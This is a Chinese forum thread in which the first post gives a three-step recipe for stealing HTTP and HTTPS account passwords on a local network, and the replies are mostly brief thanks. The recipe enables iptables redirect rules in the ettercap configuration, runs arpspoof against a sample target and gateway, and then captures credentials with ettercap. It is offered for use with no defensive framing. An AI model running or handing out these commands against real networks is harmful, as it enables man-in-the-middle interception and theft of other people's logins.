priess 发表于 2018-4-16 09:08:38

ettercap获取http&https账号和密码

一:先编辑配置文件
im/etc/ettercap/etter.conf去掉前面的#号
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
二:开启ARP欺骗
arpspoof -t 目标 网关 -i 设备 arpspoof -i waln0 -t 192.168.1.6 192.168.1.1
三:截取密码
ettercap -Tq -i wlan0
原文链接
视频演示

zhen 发表于 2018-4-17 16:13:54

学习了!{:9074:}

admin 发表于 2018-7-22 11:45:57

支持下!:daxiao:

juzhe 发表于 2018-7-23 14:45:51

输入 ifconfig -a 查看网卡,多了个 wlan0,说明网卡已经适配好,不然可能是驱动有问题。

yuchao5656 发表于 2018-11-23 10:59:45

厉害了原来网络这么不安全

帕帕退你 发表于 2019-2-22 16:33:50

看看,学习学习

Smile 发表于 2021-3-28 09:25:58

https也能吗?

luosong0054 发表于 2021-9-1 18:19:37

可以xiedehao

luosong0054 发表于 2021-9-1 18:22:30

不错不错,写得好

luosong0054 发表于 2021-9-1 18:23:43

代码写得厉害
页: [1] 2
查看完整版本: ettercap获取http&https账号和密码